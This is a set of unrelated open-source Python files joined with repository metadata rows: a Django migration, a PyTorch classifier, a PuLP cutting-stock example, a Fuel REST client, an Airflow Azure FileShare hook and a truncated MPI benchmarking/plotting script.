# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# The presence of this file turns this directory into a Python package
'''
This is the GNU Radio KWAN module. Place your Python package
description here (python/__init__.py).
'''
# import swig generated symbols into the Kwan namespace
try:
    # this might fail if the module is python-only; the swig-generated
    # extension is optional, so the ImportError is deliberately swallowed
    from Kwan_swig import *
except ImportError:
    pass
# import any pure python here
#
| 32.314286 | 74 | 0.765694 |
acfa866624932b4ba11e15b2079f362857adf65d | 390 | py | Python | remote_tutor/tuition/migrations/0005_auto_20191101_0950.py | wasim2263/remote-tutor | 803dbd5b500bf5b82e4888f40463cbd2db1125ac | [
"MIT"
] | null | null | null | remote_tutor/tuition/migrations/0005_auto_20191101_0950.py | wasim2263/remote-tutor | 803dbd5b500bf5b82e4888f40463cbd2db1125ac | [
"MIT"
] | null | null | null | remote_tutor/tuition/migrations/0005_auto_20191101_0950.py | wasim2263/remote-tutor | 803dbd5b500bf5b82e4888f40463cbd2db1125ac | [
"MIT"
] | null | null | null | # Generated by Django 2.2.2 on 2019-11-01 09:50
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the RequestTutor model to RequestTuition."""

    # must run after the latest tutor and tuition migrations
    dependencies = [
        ('tutor', '0009_auto_20191030_1706'),
        ('tuition', '0004_auto_20190919_0646'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='RequestTutor',
            new_name='RequestTuition',
        ),
    ]
| 20.526316 | 47 | 0.610256 |
acfa86c39bdc0206c23aa05355ccc89435a8c927 | 2,895 | py | Python | lib/modeling/meta_embedding_classifier.py | YerongLi2/LTVRR | 26a6a03dd44cb6b008e0974ad9915a149d666786 | [
"MIT"
] | 13 | 2021-04-24T12:32:48.000Z | 2022-03-14T15:47:31.000Z | lib/modeling/meta_embedding_classifier.py | YerongLi2/LTVRR | 26a6a03dd44cb6b008e0974ad9915a149d666786 | [
"MIT"
] | 5 | 2021-02-26T04:44:52.000Z | 2022-03-31T07:16:53.000Z | lib/modeling/meta_embedding_classifier.py | Vision-CAIR/relTransformer_github | ec3be058da9c4f2f68d7c4dfb759209748732b93 | [
"MIT"
] | 1 | 2022-03-30T08:06:08.000Z | 2022-03-30T08:06:08.000Z | import torch
import torch.nn as nn
from modeling.cos_norm_classifier import CosNorm_Classifier
from utils.memory_utils import *
import pdb
class MetaEmbedding_Classifier(nn.Module):
    """Meta-embedding classifier: combines a direct feature with a
    memory feature hallucinated from class centroids, then classifies
    with a cosine-norm classifier (OLTR-style)."""

    def __init__(self, feat_dim=2048, num_classes=1000):
        super(MetaEmbedding_Classifier, self).__init__()
        self.num_classes = num_classes
        # predicts attention weights over the class centroids
        self.fc_hallucinator = nn.Linear(feat_dim, num_classes)
        # gates how much memory feature to mix into the direct feature
        self.fc_selector = nn.Linear(feat_dim, feat_dim)
        self.cosnorm_classifier = CosNorm_Classifier(feat_dim, num_classes)

    def forward(self, x, centroids, *args):
        """Classify `x` using the centroid memory.

        Assumes x is (batch, feat_dim) and centroids is
        (num_classes, feat_dim) -- TODO confirm against callers.
        Returns (logits, [direct_feature, infused_feature]).
        """
        # storing direct feature
        direct_feature = x

        # NOTE(review): batch_size/feat_size are only needed by the
        # commented-out reachability code below.
        batch_size = x.size(0)
        feat_size = x.size(1)

        # set up visual memory
        #x_expand = x.unsqueeze(1).expand(-1, self.num_classes, -1)
        #centroids_expand = centroids.unsqueeze(0).expand(batch_size, -1, -1)
        keys_memory = centroids
        #print(x_expand.shape)
        #print(centroids_expand.shape)
        # computing reachability
        #dist_cur = torch.norm(x_expand - centroids_expand, 2, 2)
        #values_nn, labels_nn = torch.sort(dist_cur, 1)
        #scale = 10.0
        #reachability = (scale / values_nn[:, 0]).unsqueeze(1).expand(-1, feat_size)

        # computing memory feature by querying and associating visual memory
        values_memory = self.fc_hallucinator(x)
        values_memory = values_memory.softmax(dim=1)
        memory_feature = torch.matmul(values_memory, keys_memory)

        # computing concept selector
        concept_selector = self.fc_selector(x)
        concept_selector = concept_selector.tanh()
        # reachability scaling is disabled in this variant
        #x = reachability * (direct_feature + concept_selector * memory_feature)
        x = (direct_feature + concept_selector * memory_feature)

        # storing infused feature
        infused_feature = concept_selector * memory_feature

        logits = self.cosnorm_classifier(x)

        return logits, [direct_feature, infused_feature]
def create_model(feat_dim=2048, num_classes=1000, stage1_weights=False, dataset=None, test=False, prd=False, *args):
    """Build a MetaEmbedding_Classifier, optionally loading stage-1 weights
    into the hallucinator.

    NOTE(review): the checkpoint path is hard-coded to a specific training
    run -- confirm it exists before enabling stage1_weights.  Also note
    `assert(dataset)` is stripped under `python -O`.
    """
    print('Loading Meta Embedding Classifier.')
    clf = MetaEmbedding_Classifier(feat_dim, num_classes)
    weights = 'Outputs/e2e_relcnn_VGG16_8_epochs_gvqa_y_loss_only_1_gpu/gvqa/Feb07-10-55-03_login104-09_step_with_prd_cls_v3/ckpt/model_step1439.pth'
    if not test:
        if stage1_weights:
            assert(dataset)
            print('Loading %s Stage 1 Classifier Weights.' % dataset)
            clf.fc_hallucinator = init_weights(model=clf.fc_hallucinator,
                                               weights_path=weights,
                                               classifier=True,
                                               prd=prd)
        else:
            print('Random initialized classifier weights.')
    return clf
| 40.774648 | 149 | 0.648014 |
acfa87248e54ad790e12fa11b552b68dcebc9730 | 1,863 | py | Python | examples/SpongeRollProblem1.py | betterhours/pulp | 0618ec018bb33b1b77e5ff868162f7ffde9f1566 | [
"MIT"
] | 4 | 2019-08-13T20:26:15.000Z | 2021-07-05T15:52:45.000Z | examples/SpongeRollProblem1.py | betterhours/pulp | 0618ec018bb33b1b77e5ff868162f7ffde9f1566 | [
"MIT"
] | null | null | null | examples/SpongeRollProblem1.py | betterhours/pulp | 0618ec018bb33b1b77e5ff868162f7ffde9f1566 | [
"MIT"
] | 1 | 2019-12-03T17:11:35.000Z | 2019-12-03T17:11:35.000Z | """
The Simplified Sponge Roll Problem for the PuLP Modeller
Authors: Antony Phillips, Dr Stuart Mitchell 2007
"""
# Import PuLP modeler functions
from pulp import *
# A list of all the roll lengths is created
LenOpts = ["5","7","9"]
# A dictionary of the demand for each roll length is created
rollDemand = {"5":150,
"7":200,
"9":300}
# A list of all the patterns is created
PatternNames = ["A","B","C"]
# Creates a list of the number of rolls in each pattern for each different roll length
patterns = [#A B C
[0,2,2],# 5
[1,1,0],# 7
[1,0,1] # 9
]
# The cost of each 20cm long sponge roll used
cost = 1
# The pattern data is made into a dictionary
patterns = makeDict([LenOpts,PatternNames],patterns,0)
# The problem variables of the number of each pattern to make are created
vars = LpVariable.dicts("Patt",PatternNames,0,None,LpInteger)
# The variable 'prob' is created
prob = LpProblem("Cutting Stock Problem",LpMinimize)
# The objective function is entered: the total number of large rolls used * the fixed cost of each
prob += lpSum([vars[i]*cost for i in PatternNames]),"Production Cost"
# The demand minimum constraint is entered
for i in LenOpts:
prob += lpSum([vars[j]*patterns[i][j] for j in PatternNames])>=rollDemand[i],"Ensuring enough %s cm rolls"%i
# The problem data is written to an .lp file
prob.writeLP("SpongeRollProblem.lp")
# The problem is solved using PuLP's choice of Solver
prob.solve()
# The status of the solution is printed to the screen
print("Status:", LpStatus[prob.status])
# Each of the variables is printed with it's resolved optimum value
for v in prob.variables():
print(v.name, "=", v.varValue)
# The optimised objective function value is printed to the screen
print("Production Costs = ", value(prob.objective))
| 30.048387 | 112 | 0.693505 |
acfa874cefa76e760e3a55e3edff89a795cb5be9 | 166 | py | Python | sideboard/run_server.py | bitbyt3r/sideboard | 45e13011a664543352d51ce073cfa9635c748bb7 | [
"BSD-3-Clause"
] | 4 | 2015-02-18T20:38:42.000Z | 2021-11-17T10:10:34.000Z | sideboard/run_server.py | bitbyt3r/sideboard | 45e13011a664543352d51ce073cfa9635c748bb7 | [
"BSD-3-Clause"
] | 84 | 2015-07-23T12:23:24.000Z | 2018-08-04T05:09:30.000Z | sideboard/run_server.py | bitbyt3r/sideboard | 45e13011a664543352d51ce073cfa9635c748bb7 | [
"BSD-3-Clause"
] | 10 | 2015-02-10T13:38:18.000Z | 2020-05-23T20:01:36.000Z | from __future__ import unicode_literals
import cherrypy
import sideboard.server
if __name__ == '__main__':
cherrypy.engine.start()
cherrypy.engine.block()
| 16.6 | 39 | 0.76506 |
acfa8799c32a9c15c54665615f3cf9ae86167657 | 8,456 | py | Python | rally/deployment/fuel/fuelclient.py | aforalee/rallyALi | 8050ca08b0e253aeb19a1cec34f33c648f00136a | [
"Apache-2.0"
] | 2 | 2015-02-06T11:03:12.000Z | 2015-03-02T10:39:44.000Z | rally/deployment/fuel/fuelclient.py | aforalee/rallyALi | 8050ca08b0e253aeb19a1cec34f33c648f00136a | [
"Apache-2.0"
] | null | null | null | rally/deployment/fuel/fuelclient.py | aforalee/rallyALi | 8050ca08b0e253aeb19a1cec34f33c648f00136a | [
"Apache-2.0"
] | 2 | 2016-03-16T03:52:13.000Z | 2020-10-02T07:58:50.000Z | # Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import re
import time
import requests
from rally.common import log as logging
LOG = logging.getLogger(__name__)
FILTER_REG = re.compile(r"^([a-z]+)\s*([<>=!]=|<|>)\s*(.+)$")
INT_REG = re.compile(r"^(\d+)(K|M|G|T)?$")
class FuelException(Exception):
    """Base class for all Fuel client errors."""
    pass


class FuelClientException(FuelException):
    """Raised when the Fuel API returns a non-2xx HTTP response."""

    def __init__(self, code, body):
        # Fix: pass the details to Exception so `args` is populated and
        # the exception survives pickling/re-raising with its context.
        super(FuelClientException, self).__init__(code, body)
        self.code = code
        self.body = body

    def __str__(self):
        return ("FuelClientException. "
                "Code: %(code)d Body: %(body)s" % {"code": self.code,
                                                   "body": self.body})


class FuelNetworkVerificationFailed(FuelException):
    """Raised when cluster network verification reports an error."""
    pass
class FuelNode(object):
    """Wrapper around a raw Fuel node dict, adding filter evaluation.

    Filter strings look like "ram>=4G" or "cpus==8" (see FILTER_REG).
    """

    # Comparison operators usable in filter strings.
    # Fix: these were rebuilt per instance in __init__; they are constants,
    # so they now live on the class (still reachable via self.*).
    ATTRIBUTE_MAP = {
        "==": lambda x, y: x == y,
        "!=": lambda x, y: x != y,
        "<=": lambda x, y: x <= y,
        ">=": lambda x, y: x >= y,
        "<": lambda x, y: x < y,
        ">": lambda x, y: x > y,
    }

    # Size-suffix multipliers (powers of 1024); None means no suffix.
    FACTOR_MAP = {
        "K": 1024,
        "M": 1048576,
        "G": 1073741824,
        "T": 1099511627776,
        None: 1,
    }

    def __init__(self, node):
        self.node = node

    def __getitem__(self, key):
        return self.node[key]

    def check_filters(self, filters):
        """Return True if the node matches every filter string."""
        return all(self.check(f) for f in filters)

    def check(self, filter_string):
        """Return True if this (unassigned) node matches ``filter_string``.

        Nodes already assigned to a cluster never match.
        """
        if self.node["cluster"] is not None:
            return False
        m = FILTER_REG.match(filter_string)
        if m is None:
            raise ValueError("Invalid filter: %s" % filter_string)
        attribute, operator, value = m.groups()
        return self._check(attribute, value, operator)

    def _check(self, attribute, value, operator):
        # dispatch to the matching _get_<attribute> accessor
        attribute = getattr(self, "_get_" + attribute)()
        checker = self.ATTRIBUTE_MAP[operator]
        m = INT_REG.match(value)
        if m:
            # expand size suffixes like "4G" into plain integers
            value = int(m.group(1)) * self.FACTOR_MAP[m.group(2)]
        return checker(attribute, value)

    def _get_ram(self):
        return self.node["meta"]["memory"]["total"]

    def _get_mac(self):
        return self.node["mac"]

    def _get_storage(self):
        # total size across all disks
        return sum(d["size"] for d in self.node["meta"]["disks"])

    def _get_cpus(self):
        return self.node["meta"]["cpu"]["total"]
class FuelCluster(object):
    """A cluster on the Fuel master, manipulated via the REST API."""

    def __init__(self, client, **config):
        """Create Fuel cluster.

        :param client: FuelClient instance.
        :param name: Name
        :param release: Release id. Integer.
        :param mode: One of multinode, ha_compact
        :param net_provider: One of nova_network, neutron
        :param net_segment_type: One of gre, vlan.
        :param dns_nameservers: List of strings.
        """
        self.client = client
        # creates the cluster server-side; keeps the returned dict
        self.cluster = client.post("clusters", config)

    def get_nodes(self):
        """Return the raw node dicts assigned to this cluster."""
        return self.client.get("nodes?cluster_id=%d" % self.cluster["id"])

    def set_nodes(self, nodes, roles):
        """Schedule ``nodes`` for addition to this cluster with ``roles``."""
        if not nodes:
            return
        node_list = []
        for n in nodes:
            node_list.append({"id": n["id"],
                              "pending_roles": roles,
                              "pending_addition": True,
                              "cluster_id": self.cluster["id"]})
        self.client.put("nodes", node_list)

    def configure_network(self, config):
        """Merge per-network overrides from ``config`` into the current
        network configuration and push it back (with verification)."""
        netconfig = self.get_network()
        for network in netconfig["networks"]:
            if network["name"] in config:
                network.update(config[network["name"]])
        self.set_network(netconfig)

    def deploy(self):
        """Apply pending changes and poll until deployment completes.

        NOTE(review): if no "deploy" task is returned, ``task_id`` is
        never bound and the poll loop raises NameError -- confirm the API
        always creates one after the changes PUT.
        """
        self.client.put("clusters/%d/changes" % self.cluster["id"], {})
        for task in self.client.get_tasks(self.cluster["id"]):
            if task["name"] == "deploy":
                task_id = task["id"]
                break

        while 1:
            time.sleep(10)
            task = self.client.get_task(task_id)
            if task["progress"] == 100:
                return
            LOG.info("Deployment in progress. %d%% done." % task["progress"])

    def get_network(self):
        """Return the network configuration for this cluster."""
        args = {"cluster_id": self.cluster["id"],
                "net_provider": self.cluster["net_provider"]}
        url = ("clusters/%(cluster_id)d/network_configuration/"
               "%(net_provider)s" % args)
        return self.client.get(url)

    def set_network(self, config):
        """Verify and then apply a full network configuration."""
        self.verify_network(config)
        args = {"cluster_id": self.cluster["id"],
                "net_provider": self.cluster["net_provider"]}
        url = ("clusters/%(cluster_id)d/network_configuration/"
               "%(net_provider)s" % args)
        self.client.put(url, config)

    def verify_network(self, config):
        """Run server-side network verification; poll until done.

        :raises FuelNetworkVerificationFailed: if verification reports
            an error message.
        """
        args = {"cluster_id": self.cluster["id"],
                "net_provider": self.cluster["net_provider"]}
        url = ("clusters/%(cluster_id)d/network_configuration/"
               "%(net_provider)s/verify" % args)
        task_id = self.client.put(url, config)["id"]
        while 1:
            time.sleep(5)
            task = self.client.get_task(task_id)
            if task["progress"] == 100:
                if task["message"]:
                    raise FuelNetworkVerificationFailed(task["message"])
                else:
                    return
            LOG.info("Network verification in progress."
                     " %d%% done." % task["progress"])

    def get_attributes(self):
        """Return the editable cluster attributes."""
        return self.client.get("clusters/%d/attributes" % self.cluster["id"])

    def get_endpoint_ip(self):
        """Return the public API endpoint IP for this cluster.

        HA clusters expose a public VIP; otherwise the first controller's
        public network address is used.
        """
        if self.cluster["mode"].startswith("ha_"):
            netdata = self.get_network()
            return netdata["public_vip"]
        for node in self.get_nodes():
            if "controller" in node["roles"]:
                for net in node["network_data"]:
                    if net["name"] == "public":
                        # strip the CIDR suffix ("1.2.3.4/24" -> "1.2.3.4")
                        return net["ip"].split("/")[0]
        raise FuelException("Unable to get endpoint ip.")
class FuelNodesCollection(object):
    """Mutable pool of unassigned FuelNode objects."""

    def __init__(self, nodes):
        # Fix: ``nodes`` used to be a *class* attribute, so every
        # collection shared (and kept appending to) the same list.
        # Each instance now owns its own list.
        self.nodes = [FuelNode(node) for node in nodes]

    def pop(self, filters):
        """Remove and return the first node matching all ``filters``.

        Returns None when no node matches.
        """
        for i, node in enumerate(self.nodes):
            if node.check_filters(filters):
                return self.nodes.pop(i)
        return None
class FuelClient(object):
    """Thin JSON/REST client for the Fuel master API."""

    def __init__(self, base_url):
        self.base_url = base_url

    def _request(self, method, url, data=None):
        """Issue an HTTP request and decode a JSON response.

        :raises FuelClientException: on any non-2xx status code.
        """
        if data:
            data = json.dumps(data)
        headers = {"content-type": "application/json"}
        # method is one of "get"/"post"/"put"/"delete" on the requests module
        reply = getattr(requests, method)(self.base_url + url, data=data,
                                          headers=headers)
        if reply.status_code >= 300 or reply.status_code < 200:
            raise FuelClientException(code=reply.status_code, body=reply.text)
        if reply.text and reply.headers["content-type"] == "application/json":
            return json.loads(reply.text)
        # non-JSON (or empty) responses are returned as-is
        return reply

    def get(self, url):
        return self._request("get", url)

    def post(self, url, data):
        return self._request("post", url, data)

    def put(self, url, data):
        return self._request("put", url, data)

    def delete(self, url):
        return self._request("delete", url)

    def get_releases(self):
        return self.get("releases")

    def get_task(self, task_id):
        return self.get("tasks/%d" % task_id)

    def get_tasks(self, cluster_id):
        return self.get("tasks?cluster_id=%d" % cluster_id)

    def get_node(self, node_id):
        return self.get("nodes/%d" % node_id)

    def get_nodes(self):
        return FuelNodesCollection(self.get("nodes"))

    def delete_cluster(self, cluster_id):
        self.delete("clusters/%s" % cluster_id)
acfa881ddb266b92d56a21c6eff46dce2f4ba1e1 | 13,221 | py | Python | airflow/providers/microsoft/azure/hooks/azure_fileshare.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 15,947 | 2019-01-05T13:51:02.000Z | 2022-03-31T23:33:16.000Z | airflow/providers/microsoft/azure/hooks/azure_fileshare.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 14,603 | 2019-01-05T09:43:19.000Z | 2022-03-31T23:11:59.000Z | airflow/providers/microsoft/azure/hooks/azure_fileshare.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 8,429 | 2019-01-05T19:45:47.000Z | 2022-03-31T22:13:01.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import warnings
from typing import Any, Dict, List, Optional
from azure.storage.file import File, FileService
from airflow.hooks.base import BaseHook
class AzureFileShareHook(BaseHook):
    """
    Interacts with Azure FileShare Storage.
    :param azure_fileshare_conn_id: Reference to the
        :ref:`Azure Container Volume connection id<howto/connection:azure_fileshare>`
        of an Azure account of which container volumes should be used.
    """
    # Attributes Airflow uses to register this hook's connection type.
    conn_name_attr = "azure_fileshare_conn_id"
    default_conn_name = 'azure_fileshare_default'
    conn_type = 'azure_fileshare'
    hook_name = 'Azure FileShare'
    def __init__(self, azure_fileshare_conn_id: str = 'azure_fileshare_default') -> None:
        super().__init__()
        self.conn_id = azure_fileshare_conn_id
        self._conn = None  # lazily-created FileService, cached by get_conn()
    @staticmethod
    def get_connection_form_widgets() -> Dict[str, Any]:
        """Returns connection widgets to add to connection form"""
        # Imported lazily: these UI packages are only available inside the
        # Airflow webserver process.
        from flask_appbuilder.fieldwidgets import BS3PasswordFieldWidget, BS3TextFieldWidget
        from flask_babel import lazy_gettext
        from wtforms import PasswordField, StringField
        return {
            "extra__azure_fileshare__sas_token": PasswordField(
                lazy_gettext('SAS Token (optional)'), widget=BS3PasswordFieldWidget()
            ),
            "extra__azure_fileshare__connection_string": StringField(
                lazy_gettext('Connection String (optional)'), widget=BS3TextFieldWidget()
            ),
            "extra__azure_fileshare__protocol": StringField(
                lazy_gettext('Account URL or token (optional)'), widget=BS3TextFieldWidget()
            ),
        }
    @staticmethod
    def get_ui_field_behaviour() -> Dict:
        """Returns custom field behaviour"""
        # NOTE(review): 'host' appears both in hidden_fields and in
        # relabeling below; the relabel has no visible effect while the
        # field stays hidden -- confirm which is intended.
        return {
            "hidden_fields": ['schema', 'port', 'host', 'extra'],
            "relabeling": {
                'login': 'Blob Storage Login (optional)',
                'password': 'Blob Storage Key (optional)',
                'host': 'Account Name (Active Directory Auth)',
            },
            "placeholders": {
                'login': 'account name',
                'password': 'secret',
                'host': 'account url',
                'extra__azure_fileshare__sas_token': 'account url or token (optional)',
                'extra__azure_fileshare__connection_string': 'account url or token (optional)',
                'extra__azure_fileshare__protocol': 'account url or token (optional)',
            },
        }
    def get_conn(self) -> FileService:
        """Return the FileService object."""
        prefix = "extra__azure_fileshare__"
        if self._conn:
            # Reuse the client built on a previous call.
            return self._conn
        conn = self.get_connection(self.conn_id)
        service_options_with_prefix = conn.extra_dejson
        service_options = {}
        for key, value in service_options_with_prefix.items():
            # in case dedicated FileShareHook is used, the connection will use the extras from UI.
            # in case deprecated wasb hook is used, the old extras will work as well
            if key.startswith(prefix):
                if value != '':
                    # Strip the UI prefix before passing to FileService.
                    service_options[key[len(prefix) :]] = value
                else:
                    # warn if the deprecated wasb_connection is used
                    warnings.warn(
                        "You are using deprecated connection for AzureFileShareHook."
                        " Please change it to `Azure FileShare`.",
                        DeprecationWarning,
                    )
            else:
                service_options[key] = value
                # warn if the old non-prefixed value is used
                warnings.warn(
                    "You are using deprecated connection for AzureFileShareHook."
                    " Please change it to `Azure FileShare`.",
                    DeprecationWarning,
                )
        self._conn = FileService(account_name=conn.login, account_key=conn.password, **service_options)
        return self._conn
    def check_for_directory(self, share_name: str, directory_name: str, **kwargs) -> bool:
        """
        Check if a directory exists on Azure File Share.
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.exists()` takes.
        :type kwargs: object
        :return: True if the file exists, False otherwise.
        :rtype: bool
        """
        return self.get_conn().exists(share_name, directory_name, **kwargs)
    def check_for_file(self, share_name: str, directory_name: str, file_name: str, **kwargs) -> bool:
        """
        Check if a file exists on Azure File Share.
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param file_name: Name of the file.
        :type file_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.exists()` takes.
        :type kwargs: object
        :return: True if the file exists, False otherwise.
        :rtype: bool
        """
        return self.get_conn().exists(share_name, directory_name, file_name, **kwargs)
    def list_directories_and_files(
        self, share_name: str, directory_name: Optional[str] = None, **kwargs
    ) -> list:
        """
        Return the list of directories and files stored on a Azure File Share.
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.list_directories_and_files()` takes.
        :type kwargs: object
        :return: A list of files and directories
        :rtype: list
        """
        return self.get_conn().list_directories_and_files(share_name, directory_name, **kwargs)
    def list_files(self, share_name: str, directory_name: Optional[str] = None, **kwargs) -> List[str]:
        """
        Return the list of files stored on a Azure File Share.
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.list_directories_and_files()` takes.
        :type kwargs: object
        :return: A list of files
        :rtype: list
        """
        # Filter the combined listing down to File entries only.
        return [
            obj.name
            for obj in self.list_directories_and_files(share_name, directory_name, **kwargs)
            if isinstance(obj, File)
        ]
    def create_share(self, share_name: str, **kwargs) -> bool:
        """
        Create new Azure File Share.
        :param share_name: Name of the share.
        :type share_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.create_share()` takes.
        :type kwargs: object
        :return: True if share is created, False if share already exists.
        :rtype: bool
        """
        return self.get_conn().create_share(share_name, **kwargs)
    def delete_share(self, share_name: str, **kwargs) -> bool:
        """
        Delete existing Azure File Share.
        :param share_name: Name of the share.
        :type share_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.delete_share()` takes.
        :type kwargs: object
        :return: True if share is deleted, False if share does not exist.
        :rtype: bool
        """
        return self.get_conn().delete_share(share_name, **kwargs)
    def create_directory(self, share_name: str, directory_name: str, **kwargs) -> list:
        """
        Create a new directory on a Azure File Share.
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.create_directory()` takes.
        :type kwargs: object
        :return: A list of files and directories
        :rtype: list
        """
        return self.get_conn().create_directory(share_name, directory_name, **kwargs)
    def get_file(
        self, file_path: str, share_name: str, directory_name: str, file_name: str, **kwargs
    ) -> None:
        """
        Download a file from Azure File Share.
        :param file_path: Where to store the file.
        :type file_path: str
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param file_name: Name of the file.
        :type file_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.get_file_to_path()` takes.
        :type kwargs: object
        """
        self.get_conn().get_file_to_path(share_name, directory_name, file_name, file_path, **kwargs)
    def get_file_to_stream(
        self, stream: str, share_name: str, directory_name: str, file_name: str, **kwargs
    ) -> None:
        """
        Download a file from Azure File Share.
        :param stream: A filehandle to store the file to.
        :type stream: file-like object
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param file_name: Name of the file.
        :type file_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.get_file_to_stream()` takes.
        :type kwargs: object
        """
        self.get_conn().get_file_to_stream(share_name, directory_name, file_name, stream, **kwargs)
    def load_file(
        self, file_path: str, share_name: str, directory_name: str, file_name: str, **kwargs
    ) -> None:
        """
        Upload a file to Azure File Share.
        :param file_path: Path to the file to load.
        :type file_path: str
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param file_name: Name of the file.
        :type file_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.create_file_from_path()` takes.
        :type kwargs: object
        """
        self.get_conn().create_file_from_path(share_name, directory_name, file_name, file_path, **kwargs)
    def load_string(
        self, string_data: str, share_name: str, directory_name: str, file_name: str, **kwargs
    ) -> None:
        """
        Upload a string to Azure File Share.
        :param string_data: String to load.
        :type string_data: str
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param file_name: Name of the file.
        :type file_name: str
        :param kwargs: Optional keyword arguments that
            `FileService.create_file_from_text()` takes.
        :type kwargs: object
        """
        self.get_conn().create_file_from_text(share_name, directory_name, file_name, string_data, **kwargs)
    def load_stream(
        self, stream: str, share_name: str, directory_name: str, file_name: str, count: str, **kwargs
    ) -> None:
        """
        Upload a stream to Azure File Share.
        :param stream: Opened file/stream to upload as the file content.
        :type stream: file-like
        :param share_name: Name of the share.
        :type share_name: str
        :param directory_name: Name of the directory.
        :type directory_name: str
        :param file_name: Name of the file.
        :type file_name: str
        :param count: Size of the stream in bytes
        :type count: int
        :param kwargs: Optional keyword arguments that
            `FileService.create_file_from_stream()` takes.
        :type kwargs: object
        """
        self.get_conn().create_file_from_stream(
            share_name, directory_name, file_name, stream, count, **kwargs
        )
| 39.231454 | 107 | 0.626125 |
acfa885bf831852a736c73d8dca19a0b985820be | 1,932 | py | Python | time_template/draw_multi_proc.py | tsw303005/parallel_program | 0d1d46802dfb146b6d0933ee58711d9cad4b9dd6 | [
"MIT"
] | 4 | 2021-11-14T15:27:30.000Z | 2022-01-19T20:07:18.000Z | time_template/draw_multi_proc.py | Howeng98/Parallel-Programming | 0d1d46802dfb146b6d0933ee58711d9cad4b9dd6 | [
"MIT"
] | null | null | null | time_template/draw_multi_proc.py | Howeng98/Parallel-Programming | 0d1d46802dfb146b6d0933ee58711d9cad4b9dd6 | [
"MIT"
] | 2 | 2021-12-02T13:53:59.000Z | 2022-01-25T08:13:24.000Z | import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
from subprocess import Popen, PIPE, STDOUT
# Problem size and testcase name are forwarded verbatim into the srun
# command below; <testcase>.in / <testcase>.out are assumed to exist.
n = input("please input n: ")
testcase = input("please input testcase: ")
def print_command(p):
    """Echo a subprocess's stdout to our stdout, one stripped line at a time."""
    output = p.stdout
    for raw_line in output:
        print(raw_line.strip())
# Rebuild the benchmark binary before timing anything.
p = Popen(["make clean"], shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
print_command(p)
p = Popen(["make"], shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
print_command(p)
'''for different process experiment'''
result_cpu = list()
result_comm = list()
result_io = list()
process_num = [1, 2, 4, 8, 16, 32, 48]
for process in tqdm(process_num):
    cmd = f"srun -n{process} ./hw1 {n} {testcase}.in {testcase}.out"
    p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
    # The benchmark is expected to print three lines: CPU, communication
    # and I/O time (seconds) -- TODO confirm against hw1's output format.
    line = [i for i in p.stdout]
    result_cpu.append(float(line[0]))
    result_comm.append(float(line[1]))
    result_io.append(float(line[2]))
labels = [str(i) for i in process_num]
# bar chart for different process number's CPU, COMM, IO time (stacked)
fig, ax = plt.subplots()
ax.bar(labels, result_cpu, label='CPU_time')
ax.bar(labels, result_comm, bottom=result_cpu, label='COMM_time')
ax.bar(labels, result_io, bottom=np.array(result_cpu)+np.array(result_comm), label='IO_time')
ax.set_xlabel("process number")
ax.set_ylabel("runtime (seconds)")
ax.set_title(f"different process performance")
ax.legend(loc="upper right")
fig.savefig(f"./images/{testcase}_diff_proc_bar.png")
# line chart for speed up factor (total runtime at 1 process / runtime at N)
results = [result_cpu[i]+result_comm[i]+result_io[i] for i in range(len(process_num))]
total = [results[0]/results[i] for i in range(len(process_num))]
plt.figure(dpi=100, linewidth=2)
plt.plot(process_num, total, 'o-', color='g')
plt.xlabel('Process Number')
plt.xticks(np.arange(1, 49, 5))
